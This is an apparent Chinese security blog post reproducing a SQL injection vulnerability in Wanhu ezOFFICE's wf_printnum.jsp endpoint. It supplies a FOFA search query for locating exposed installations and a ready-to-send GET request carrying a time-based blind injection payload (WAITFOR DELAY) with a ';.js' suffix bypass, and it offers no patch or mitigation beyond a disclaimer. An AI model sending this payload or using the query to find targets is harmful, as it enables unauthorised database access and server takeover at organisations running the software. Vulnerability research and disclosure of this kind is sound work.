【漏洞复现】万户 ezOFFICE wf_printnum.jsp SQL注入漏洞

0x01 产品简介

万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

万户 ezOFFICE wf_printnum.jsp 接口存在SQL注入漏洞,恶意攻击者可利用此漏洞获取数据库信息,获取服务器控制权限。

0x03 测绘语句

fofa: app="万户网络-ezOFFICE"

0x04 漏洞复现

GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:2%27-- HTTP/1.1

0x05 影响范围

万户 ezOFFICE

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-28 06:54:02       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-28 06:54:02       106 阅读
  3. 在Django里面运行非项目文件

    2024-03-28 06:54:02       87 阅读
  4. Python语言-面向对象

    2024-03-28 06:54:02       96 阅读

热门阅读

  1. Floyd算法 【多源最短路】模板

    2024-03-28 06:54:02       39 阅读
  2. 服务器硬件基础知识详解

    2024-03-28 06:54:02       36 阅读
  3. Python django vue 学生信息管理案例源码

    2024-03-28 06:54:02       38 阅读
  4. 对象成员的引用——个人练习

    2024-03-28 06:54:02       32 阅读
  5. hive授予指定用户特定权限及beeline使用

    2024-03-28 06:54:02       37 阅读
  6. PSINS初学指导

    2024-03-28 06:54:02       36 阅读